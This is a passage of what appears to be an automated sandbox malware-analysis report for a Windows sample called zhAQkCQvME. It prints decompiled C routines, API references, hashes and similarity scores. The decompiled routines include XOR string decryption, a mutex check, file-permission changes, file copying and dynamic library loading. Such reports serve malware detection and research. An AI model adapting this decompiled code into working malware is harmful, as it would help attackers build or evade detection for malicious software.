					return _t12;
				}
				if(_a8 != 0xffffffff) {
					if(_a8 == 0xfffffffe) {
						_a8 = lstrlenW( *_a4);
					}
				} else {
					_a8 = lstrlenA( *_a4);
				}
				E00404120( *_a4,  *_a4, 0, _a8);
				_t21 =  *0x41f6e0; // 0x15d0000
				_t16 = HeapFree(_t21, 0,  *_a4); // executed
				 *_a4 = 0;
				return _t16;
			}

0x00403f13
0x00403f19
0x00403f7a
0x00403f7a
0x00403f1f
0x00403f36
0x00403f44
0x00403f44
0x00403f21
0x00403f2d
0x00403f2d
0x00403f53
0x00403f63
0x00403f6a
0x00403f73
0x00000000

APIs

lstrlenA.KERNEL32(00407F26,?,0040817E,00407D67,000000FF), ref: 00403F27
lstrlenW.KERNEL32(?,?,0040817E,00407D67,000000FF), ref: 00403F3E
HeapFree.KERNEL32(015D0000,00000000,00000000), ref: 00403F6A

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: lstrlen$FreeHeap
String ID:
API String ID: 4056650430-0
Opcode ID: c262ec725134b8a6404044be4711405939292a8b4aa8c9e5420634a38f9dcb3b
Instruction ID: bc7d877b43823dbc34b6ac04e5ec67b94b3fe5babbbab33c82c229225e279256
Opcode Fuzzy Hash: c262ec725134b8a6404044be4711405939292a8b4aa8c9e5420634a38f9dcb3b
Instruction Fuzzy Hash: 8001C874600305EFCB14DF54D844AAA3B79AB89761F10C269F9698F3D0C739EA81CF94

Uniqueness

Uniqueness Score: 4.65%

Function 00408AF0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 89
UNIQUE

Download Yara Rule

C-Code - Quality: 38%

			E00408AF0(signed int _a4, char _a8) {
				char _v44;
				intOrPtr _v48;
				char _v52;
				char _v68;
				char _v72;
				intOrPtr _v76;
				signed int _t30;
				intOrPtr _t31;
				char _t35;
				intOrPtr _t38;
				signed int _t39;
				intOrPtr _t52;
				void* _t55;
				void* _t57;
				void* _t59;
				void* _t61;

				_v52 = 0;
				_v48 = 1;
				if(_a4 <= 1) {
					__eflags = _a8;
					if(_a8 == 0) {
						_v76 = 0x41f804;
					} else {
						_v76 = _a8;
					}
					_push(0);
					_push(0xa);
					_push( &_v68);
					_t30 = _a4;
					_push(_t30);
					L00410446();
					_push(_t30);
					_push(0x41880c);
					_push(0x418808);
					_push(0x418804);
					_t31 = E00404C10(_v76);
					_t57 = _t55 + 0x24;
					_v52 = _t31;
					__eflags = _v52;
					if(__eflags == 0) {
						L19:
						return _v48;
					} else {
						_v72 = 0;
						E00406F80(__eflags,  &_v44, _v52);
						_push(0);
						_push( &_v44);
						_push(0x418800);
						_t52 =  *0x4217a8; // 0x15d075e
						_t35 = E00404C10(_t52);
						_t59 = _t57 + 0x18;
						_v72 = _t35;
						__eflags = _v72;
						if(_v72 == 0) {
							L18:
							E00403F10( &_v72, 0xffffffff);
							goto L19;
						} else {
							goto L9;
						}
						while(1) {
							L9:
							__eflags = 0;
							if(0 == 0) {
								break;
							}
						}
						_t38 = E00407050(_v72, _v72); // executed
						_t61 = _t59 + 4;
						 *((intOrPtr*)(0x41f6f4 + _a4 * 4)) = _t38;
						_t39 = _a4;
						__eflags =  *((intOrPtr*)(0x41f6f4 + _t39 * 4));
						if( *((intOrPtr*)(0x41f6f4 + _t39 * 4)) != 0) {
							while(1) {
								__eflags = 0;
								if(0 == 0) {
									break;
								}
							}
							L17:
							E00403F10( &_v72, 0xffffffff);
							_t59 = _t61 + 8;
							goto L18;
						} else {
							goto L12;
						}
						while(1) {
							L12:
							__eflags = 0;
							if(0 == 0) {
								break;
							}
						}
						_v48 = 0;
						goto L17;
					}
				}
				while(0 != 0) {
				}
				return 1;
			}

0x00408af6
0x00408afd
0x00408b08
0x00408b1a
0x00408b1e
0x00408b28
0x00408b20
0x00408b23
0x00408b23
0x00408b2f
0x00408b31
0x00408b36
0x00408b37
0x00408b3a
0x00408b3b
0x00408b43
0x00408b44
0x00408b49
0x00408b4e
0x00408b57
0x00408b5c
0x00408b5f
0x00408b62
0x00408b66
0x00408c00
0x00000000
0x00408b6c
0x00408b6c
0x00408b7b
0x00408b83
0x00408b88
0x00408b89
0x00408b8e
0x00408b95
0x00408b9a
0x00408b9d
0x00408ba0
0x00408ba4
0x00408bf2
0x00408bf8
0x00000000
0x00000000
0x00000000
0x00000000
0x00408ba6
0x00408ba6
0x00408ba6
0x00408ba8
0x00000000
0x00000000
0x00408baa
0x00408bb0
0x00408bb5
0x00408bbb
0x00408bc2
0x00408bc5
0x00408bcd
0x00408bde
0x00408bde
0x00408be0
0x00000000
0x00000000
0x00408be2
0x00408be4
0x00408bea
0x00408bef
0x00000000
0x00000000
0x00000000
0x00000000
0x00408bcf
0x00408bcf
0x00408bcf
0x00408bd1
0x00000000
0x00000000
0x00408bd3
0x00408bd5
0x00000000
0x00408bd5
0x00408b66
0x00408b0a
0x00408b0e
0x00000000

APIs

_ltoa.MSVCRT ref: 00408B3B

Strings

zhAQkCQvME, xrefs: 00408B28, 00408B56

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: _ltoa
String ID: zhAQkCQvME
API String ID: 2260271510-2550356889
Opcode ID: 4fe186611bd831be4d22f070351714383d0e0fc0ba5ff32c875123a95a01b3c6
Instruction ID: 61f08285e5823edc97c7f7e7f9f77c2e5623155140789b76fb4e832baa46a55e
Opcode Fuzzy Hash: 4fe186611bd831be4d22f070351714383d0e0fc0ba5ff32c875123a95a01b3c6
Instruction Fuzzy Hash: 1431AEB0D00208ABCB10EFA4DD41BEE7774AB44304F24453FF9457A2C0EB79A986CB5A

Uniqueness

Uniqueness Score: 100.00%

Function 005C2D3A, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 148memoryUNIQUE

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 005C2E41

Strings

fg(, xrefs: 005C2DD0

Memory Dump Source

Source File: 00000000.00000002.470846166.005C0000.00000040.00000001.sdmp, Offset: 005C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c0000_zhAQkCQvME.jbxd

Similarity

API ID: AllocVirtual
String ID: fg(
API String ID: 4275171209-1623029493
Opcode ID: ff81fc3ebf4ceace7e9ecac7a11187996e8646a851cbfc2bd2b4a2004e1f028d
Instruction ID: a7e22d5ed2b737d649a73beaa093aadd3d6582d7b7f5ad461cf262bdef9d9ab3
Opcode Fuzzy Hash: ff81fc3ebf4ceace7e9ecac7a11187996e8646a851cbfc2bd2b4a2004e1f028d
Instruction Fuzzy Hash: 5561AAB59193818FD348DF29C18065AFBF1BFC8714F11896EE8889B351E3B5E845CB86

Uniqueness

Uniqueness Score: 100.00%

Function 00407D90, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 121
UNIQUE

Download Yara Rule

C-Code - Quality: 100%

			E00407D90(void* __eflags, signed int _a4) {
				int _v8;
				signed int _v12;
				signed int _v16;
				void _v82;
				short _v84;
				signed int _v88;
				char _v92;
				short _t51;
				signed int _t53;
				signed int _t64;
				signed int _t66;
				signed int _t68;
				char _t70;
				void* _t71;
				signed int _t84;
				signed int _t89;
				signed int _t95;
				void* _t100;
				void* _t102;
				void* _t104;

				_v8 = 0;
				_v16 = 0x100;
				_t51 =  *0x415240; // 0x0
				_v84 = _t51;
				_t77 =  &_v82;
				memset( &_v82, 0, 0x3e);
				_v16 = _v16 + _a4;
				_t53 = E00403F80( &_v82, 0x415340, 0x839);
				_t102 = _t100 + 0x14;
				 *0x41f6e8 = _t53;
				if( *0x41f6e8 != 0) {
					if((_v16 & 0x00000003) == 0) {
						L7:
						 *0x41f6e4 = 0;
						_v12 = 0;
						_v88 = 1;
						while(_v12 < 0x838) {
							_t24 = _v12 % 0x40 + 0x41f268; // 0xc665b518
							_t64 =  *0x41f6e8; // 0x15d0590
							_t95 =  *0x41f6e8; // 0x15d0590
							 *((char*)(_t95 + _v12)) =  *(_t64 + _v12) ^  *_t24;
							_t66 =  *0x41f6e8; // 0x15d0590
							if( *((char*)(_t66 + _v12)) == 0) {
								_v16 = _a4;
								_t68 = _v12;
								_t84 =  *0x41f6e8; // 0x15d0590
								_t32 = _t68 + 1; // 0x15d0591
								0x421720[_v88] = _t84 + _t32;
								_v88 = _v88 + 1;
							}
							_t77 = _v12 + 1;
							_v12 = _v12 + 1;
						}
						_t89 =  *0x41f6e8; // 0x15d0590
						 *0x421720 = _t89;
						_v88 = 0;
						while(_v88 < 0x100) {
							if(_v88 < 0x41 || _v88 > 0x5a) {
								_t77 = _v88;
								 *((char*)(_v88 + 0x4218a0)) = _v88;
							} else {
								_t77 = _v88 + 0x20;
								 *((char*)(_v88 + 0x4218a0)) = _v88 + 0x20;
							}
							_v88 = _v88 + 1;
						}
						if(E00407CF0(_t77, _a4) >= 0) {
							return 0;
						}
						return 0xfffffffe;
					}
					_t70 = E00408060( &_v82, 0x2a50);
					_t102 = _t102 + 4;
					_v92 = _t70;
					if(_v92 == 0) {
						goto L7;
					}
					_t77 = _v92;
					_t71 = E0040E040(_v92); // executed
					_t104 = _t102 + 4;
					if(_t71 == 0) {
						E00408170( &_v92);
						_t102 = _t104 + 4;
						goto L7;
					}
					return E00408170( &_v92) | 0xffffffff;
				}
				return _t53 | 0xffffffff;
			}

0x00407d96
0x00407d9d
0x00407da4
0x00407daa
0x00407db2
0x00407db6
0x00407dc4
0x00407dd1
0x00407dd6
0x00407dd9
0x00407de5
0x00407df5
0x00407e3d
0x00407e3d
0x00407e47
0x00407e4e
0x00407e60
0x00407e75
0x00407e7c
0x00407e89
0x00407e92
0x00407e94
0x00407ea1
0x00407ea6
0x00407ea9
0x00407eac
0x00407eb2
0x00407eb9
0x00407ec6
0x00407ec6
0x00407e5a
0x00407e5d
0x00407e5d
0x00407ecb
0x00407ed1
0x00407ed7
0x00407ee9
0x00407ef6
0x00407f12
0x00407f15
0x00407efe
0x00407f01
0x00407f07
0x00407f07
0x00407ee6
0x00407ee6
0x00407f2b
0x00000000
0x00407f34
0x00000000
0x00407f2d
0x00407dfc
0x00407e01
0x00407e04
0x00407e0b
0x00000000
0x00000000
0x00407e0d
0x00407e11
0x00407e16
0x00407e1b
0x00407e35
0x00407e3a
0x00000000
0x00407e3a
0x00000000
0x00407e29
0x00000000

APIs

memset.MSVCRT ref: 00407DB6

Strings

Z, xrefs: 00407EF8

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: memset
String ID: Z
API String ID: 2221118986-1505515367
Opcode ID: 0808a14b12f9a50cdb2a89c6be7d3c3cf1370481780cc273158010b0a12bcdfc
Instruction ID: 99a0f7654a7c3690d0304edbb1e910a17534ffed8a5297fb37cd542f71b5734e
Opcode Fuzzy Hash: 0808a14b12f9a50cdb2a89c6be7d3c3cf1370481780cc273158010b0a12bcdfc
Instruction Fuzzy Hash: C551B671E05248DBDB04DFE4D841ADDBBB1AF44308F14817AD4066B3D5D7786A4ACB8A

Uniqueness

Uniqueness Score: 100.00%

Function 004100E0, Relevance: 3.1, APIs: 2, Instructions: 80sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0040E080: GetFileAttributesW.KERNELBASE(?,?,?,0040FC12,?), ref: 0040E088

CreateDirectoryW.KERNELBASE(?,00000000), ref: 00410136
Sleep.KERNELBASE(000005DC), ref: 00410154

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: AttributesCreateDirectoryFileSleep
String ID:
API String ID: 2985974282-0
Opcode ID: 156773fa4ab1bfbacbad292ad1fa909d505cfceaf605374875965ef426ae1b88
Instruction ID: 02c36c1e30a3ced06d38e802c0fdca82db26816d1cc54995daec77cd7cb2c5ea
Opcode Fuzzy Hash: 156773fa4ab1bfbacbad292ad1fa909d505cfceaf605374875965ef426ae1b88
Instruction Fuzzy Hash: 9F21F875A04205FBDB108A65CD017FB7674AB40354F24862BE812D63C0D7FF85C28ADE

Uniqueness

Uniqueness Score: 4.65%

Function 0040DFD0, Relevance: 3.0, APIs: 2, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E0040DFD0(void* __ecx, WCHAR* _a4) {
				intOrPtr _v8;
				struct _SECURITY_DESCRIPTOR* _v12;
				struct _SECURITY_DESCRIPTOR* _t10;
				int _t11;

				_v8 = 0;
				_t10 = E004077F0(__ecx); // executed
				_v12 = _t10;
				if(_v12 != 0) {
					_t11 = SetFileSecurityW(_a4, 4, _v12); // executed
					if(_t11 != 0) {
						while(0 != 0) {
						}
						L10:
						if(_v12 != 0) {
							LocalFree(_v12);
						}
						return _v8;
					}
					while(0 != 0) {
					}
					_v8 = 0xffffffff;
					goto L10;
				}
				while(0 != 0) {
				}
				return 0xffffffff;
			}

0x0040dfd6
0x0040dfdd
0x0040dfe2
0x0040dfe9
0x0040e000
0x0040e008
0x0040e019
0x0040e01d
0x0040e01f
0x0040e023
0x0040e029
0x0040e029
0x00000000
0x0040e02f
0x0040e00a
0x0040e00e
0x0040e010
0x00000000
0x0040e010
0x0040dfeb
0x0040dfef
0x00000000

APIs

Part of subcall function 004077F0: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00407873
Part of subcall function 004077F0: FreeSid.ADVAPI32(?), ref: 004079E4
Part of subcall function 004077F0: FreeSid.ADVAPI32(?), ref: 004079F4
Part of subcall function 004077F0: LocalFree.KERNEL32(?), ref: 00407A04
Part of subcall function 004077F0: LocalFree.KERNEL32(?), ref: 00407A14

SetFileSecurityW.KERNELBASE(?,00000004,?), ref: 0040E000
LocalFree.KERNEL32(?), ref: 0040E029

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: Free$Local$AllocateFileInitializeSecurity
String ID:
API String ID: 1812258874-0
Opcode ID: f4a87c9c53965cc8a118efdacbd080d9d67ddadf5e157c1d03d66a278d611f59
Instruction ID: eef6c5d54705a1c98e539857d7305b0ff09f53e27cb957460216eee02ccd8e7c
Opcode Fuzzy Hash: f4a87c9c53965cc8a118efdacbd080d9d67ddadf5e157c1d03d66a278d611f59
Instruction Fuzzy Hash: 56F0A934A04219DBCB109FA1C4457AE7B74AF40354F208ABBD502762C0DAB99A55E75A

Uniqueness

Uniqueness Score: 5.06%

Function 00408540, Relevance: 3.0, APIs: 2, Instructions: 31
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408540(void* __ecx, WCHAR* _a4, long _a8) {
				void* _v8;
				void* _t10;

				_v8 = 0;
				_t10 = CreateFileW(_a4, 0x40000000, 0, 0, _a8, 0x80, 0); // executed
				_v8 = _t10;
				if(_v8 != 0xffffffff) {
					if(_a8 == 4) {
						SetFilePointer(_v8, 0, 0, 2);
					}
					return _v8;
				}
				return 0;
			}

0x00408544
0x00408563
0x00408569
0x00408570
0x0040857a
0x00408586
0x00408586
0x00000000
0x0040858c
0x00000000

APIs

CreateFileW.KERNELBASE(00405CA3,40000000,00000000,00000000,00406037,00000080,00000000), ref: 00408563
SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002), ref: 00408586

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: File$CreatePointer
String ID:
API String ID: 2024441833-0
Opcode ID: f025345d6c0874f4487a9a95a42a6811a5547741a9c357143c7af818321307c1
Instruction ID: 280913b675cdd3960f64455f3f4e8820c52f26ced6c35cbdb164a628d25803e0
Opcode Fuzzy Hash: f025345d6c0874f4487a9a95a42a6811a5547741a9c357143c7af818321307c1
Instruction Fuzzy Hash: B2F0FE74741308FBEB20CB90DD46F5B7764A704720F20866AFA557B2D0CA75AE409B58

Uniqueness

Uniqueness Score: 0.99%

Function 0040FF20, Relevance: 3.0, APIs: 2, Instructions: 31
fileCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E0040FF20(WCHAR* _a4, WCHAR* _a8, intOrPtr* _a12) {
				int _v8;
				long _v12;
				int _t11;

				_v8 = 0;
				_t11 = CopyFileW(_a4, _a8, 0); // executed
				if(_t11 != 0) {
					while(0 != 0) {
					}
				} else {
					_v12 = GetLastError();
					while(0 != 0) {
					}
					if(_a12 != 0) {
						 *_a12 = _v12;
					}
					_v8 = 0xffffffff;
				}
				return _v8;
			}

0x0040ff26
0x0040ff37
0x0040ff3f
0x0040ff67
0x0040ff6b
0x0040ff41
0x0040ff47
0x0040ff4a
0x0040ff4e
0x0040ff54
0x0040ff5c
0x0040ff5c
0x0040ff5e
0x0040ff5e
0x0040ff73

APIs

CopyFileW.KERNEL32(?,00000000,00000000), ref: 0040FF37
GetLastError.KERNEL32 ref: 0040FF41

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: CopyErrorFileLast
String ID:
API String ID: 374144340-0
Opcode ID: 43f19ce9182f46d9fab6bde86d65f4ef0822cbcf959d612f55e61961ae20af51
Instruction ID: 051364268540bd582458bef35303f6e2d76f5ea8dd83603b1e431c510915e5ef
Opcode Fuzzy Hash: 43f19ce9182f46d9fab6bde86d65f4ef0822cbcf959d612f55e61961ae20af51
Instruction Fuzzy Hash: 30F0907460020ADBCB30DFA4C84479E3BB5BB49304F108177E818A77C4DB349A08CB5A

Uniqueness

Uniqueness Score: 2.28%

Function 00408C10, Relevance: 3.0, APIs: 2, Instructions: 23
synchronizationUNIQUE

Download Yara Rule

C-Code - Quality: 58%

			E00408C10(signed int _a4) {
				void* _t14;
				signed int _t18;

				if(_a4 > 1) {
					while(0 != 0) {
					}
					return 0;
				}
				if( *(0x41f6f4 + _a4 * 4) != 0) {
					ReleaseMutex( *(0x41f6f4 + _a4 * 4));
					CloseHandle( *(0x41f6f4 + _a4 * 4)); // executed
					_t18 = _a4;
					 *((intOrPtr*)(0x41f6f4 + _t18 * 4)) = 0;
					return _t18;
				}
				return _t14;
			}

0x00408c17
0x00408c19
0x00408c1d
0x00000000
0x00408c19
0x00408c2c
0x00408c39
0x00408c4a
0x00408c50
0x00408c53
0x00000000
0x00408c53
0x00408c5f

APIs

ReleaseMutex.KERNEL32(00000000), ref: 00408C39
CloseHandle.KERNELBASE ref: 00408C4A

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: CloseHandleMutexRelease
String ID:
API String ID: 4207627910-0
Opcode ID: 36ce4adfa5b588d6975a0f64056331e346b66fc6093222c751d56b4c497dffea
Instruction ID: 8ee5ba2635bf8c54c8bf21a33ae84b50c95bf413e574074426099c57ec3a81ea
Opcode Fuzzy Hash: 36ce4adfa5b588d6975a0f64056331e346b66fc6093222c751d56b4c497dffea
Instruction Fuzzy Hash: 6CF0A730104208DBDB109F50E4946A53B75B785340F10C03AE9C8477A0CB35D997CEA8

Uniqueness

Uniqueness Score: 23.02%

Function 00409F10, Relevance: 3.0, APIs: 2, Instructions: 15
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 37%

			E00409F10(void* __ecx) {
				char _v8;

				_v8 = 0;
				if( *0x42150c != 0) {
					 *0x42150c(GetCurrentProcess(),  &_v8); // executed
				}
				return _v8;
			}

0x00409f14
0x00409f22
0x00409f2f
0x00409f2f
0x00409f3b

APIs

GetCurrentProcess.KERNEL32(00000000), ref: 00409F28
IsWow64Process.KERNELBASE(00000000), ref: 00409F2F

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: Process$CurrentWow64
String ID:
API String ID: 1905925150-0
Opcode ID: 2675a2cf48f5b6894a3aa2fa3ceace13893db24736a843fa2e22e195cab3e3a3
Instruction ID: 688d70c2ae7c731e75e03db12a25a17bc8c5aec5fb0ce5ba265ed611175782b0
Opcode Fuzzy Hash: 2675a2cf48f5b6894a3aa2fa3ceace13893db24736a843fa2e22e195cab3e3a3
Instruction Fuzzy Hash: 97D0177490420CFBCB10CFD4E808B99B7ACE749302F5081E5A80992260C6389A448E58

Uniqueness

Uniqueness Score: 0.17%

Function 00409B20, Relevance: 2.6, APIs: 2, Instructions: 67
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00409B20(intOrPtr _a4, signed int* _a8) {
				signed int _v8;
				signed int* _v12;
				signed int _v16;
				signed int _v20;
				int _t44;

				_v12 = _a8;
				_v8 = 0;
				_v16 = 0;
				_v8 = 0;
				while(_v8 < _v12[1]) {
					_v20 = 0;
					_v16 = 0;
					while(_v16 <  *((intOrPtr*)(_v12[2] + (_v8 << 4) + 8))) {
						_t44 = lstrcmpiA(_a4 + 0x24,  *( *((intOrPtr*)(_v12[2] + (_v8 << 4) + 0xc)) + _v16 * 4)); // executed
						if(_t44 != 0) {
							_v16 = _v16 + 1;
							continue;
						} else {
							 *_v12 =  *_v12 |  *(_v12[2] + (_v8 << 4));
							while(0 != 0) {
							}
						}
						break;
					}
					if(_v20 == 0) {
						_v8 = _v8 + 1;
						continue;
					} else {
					}
					break;
				}
				Sleep(0xa); // executed
				return 1;
			}

0x00409b29
0x00409b2c
0x00409b33
0x00409b3a
0x00409b4c
0x00409b5b
0x00409b62
0x00409b74
0x00409ba7
0x00409baf
0x00409b71
0x00000000
0x00409bb1
0x00409bc8
0x00409bca
0x00409bce
0x00409bd0
0x00000000
0x00409baf
0x00409bd8
0x00409b49
0x00000000
0x00000000
0x00409bda
0x00000000
0x00409bd8
0x00409be3
0x00409bf1

APIs

lstrcmpi.KERNEL32(?,?), ref: 00409BA7
Sleep.KERNELBASE(0000000A), ref: 00409BE3

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: Sleeplstrcmpi
String ID:
API String ID: 1261054337-0
Opcode ID: b3555468d83ccefd9486a9029017b7cd309eaa05b6496b1ac9619b14554d2f09
Instruction ID: a77a5ae2db974ca86ad05dd13818a2fe22fb06a19d10fe396bf10f2ed207b50e
Opcode Fuzzy Hash: b3555468d83ccefd9486a9029017b7cd309eaa05b6496b1ac9619b14554d2f09
Instruction Fuzzy Hash: 3C211D74A04208EFDB04CF98D594BADB7B1FB44318F2481AAD856AB392C739BE41DF45

Uniqueness

Uniqueness Score: 2.28%

Function 005C2593, Relevance: 1.6, APIs: 1, Instructions: 118libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 005C26B9

Memory Dump Source

Source File: 00000000.00000002.470846166.005C0000.00000040.00000001.sdmp, Offset: 005C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c0000_zhAQkCQvME.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 94079a8d7e0a8657ffb95dabc3fff951ac91d831d766877d761f4c9ab4c9426f
Instruction ID: 8568f39ea672c2086d4dd4aed8f46ab57bc5359d088dddf4a21d61612ee355f0
Opcode Fuzzy Hash: 94079a8d7e0a8657ffb95dabc3fff951ac91d831d766877d761f4c9ab4c9426f
Instruction Fuzzy Hash: 23519C75A093808FC364CF69C090B5BFBE2BFC9714F64892EE99997311D671A845CB82

Uniqueness

Uniqueness Score: 0.02%

Function 005C273A, Relevance: 1.6, APIs: 1, Instructions: 84libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 005C26B9
GetProcAddress.KERNELBASE ref: 005C27AE

Memory Dump Source

Source File: 00000000.00000002.470846166.005C0000.00000040.00000001.sdmp, Offset: 005C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c0000_zhAQkCQvME.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: d8878856bc08774b7035ebf957fb3061181c92b3f836b43baccf40fc95fb68ef
Instruction ID: 33e37cfb429f7b79601cccfd4de867ad264e1b8e0302b825e2480d9cc3327476
Opcode Fuzzy Hash: d8878856bc08774b7035ebf957fb3061181c92b3f836b43baccf40fc95fb68ef
Instruction Fuzzy Hash: 8431DE76A083418FC724CF69C190A5BFBE2BFD8714F15891EE89997340D774A845CB82

Uniqueness

Uniqueness Score: 0.01%

Function 0040ECB0, Relevance: 1.6, APIs: 1, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E0040ECB0(void* __fp0, intOrPtr _a4, void* _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v540;
				char _v604;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _t30;
				void** _t50;
				void* _t64;

				_t64 = __fp0;
				_v608 = 0;
				_v612 = 0;
				_v8 = _a12;
				while(0 != 0) {
				}
				_t50 =  *0x41f864; // 0x164f7d0
				if(EqualSid(_a8,  *_t50) == 0) {
					_t30 = E0040EF00(_t64, _a8, _a4,  *((intOrPtr*)(_v8 + 4)),  &_v540,  &_v604); // executed
					if(_t30 != 0) {
						L14:
						return 0;
					}
					while(0 != 0) {
					}
					 *((intOrPtr*)(_v8 + 0x10)) =  *((intOrPtr*)(_v8 + 0x10)) + 1;
					if(E0040EBB0( &_v540, _a8, _v8) != 0 || ( *( *((intOrPtr*)(_v8 + 4)) + 0xc) & 0x00000001) != 0 || E0040E7F0( &_v604, _t64, _a8,  &_v540,  &_v604) >= 0) {
						goto L14;
					} else {
						return 0xfffffffe;
					}
				}
				while(0 != 0) {
				}
				return 0;
			}

0x0040ecb0
0x0040ecb9
0x0040ecc3
0x0040ecd0
0x0040ecd3
0x0040ecd7
0x0040ecd9
0x0040ecee
0x0040ed1a
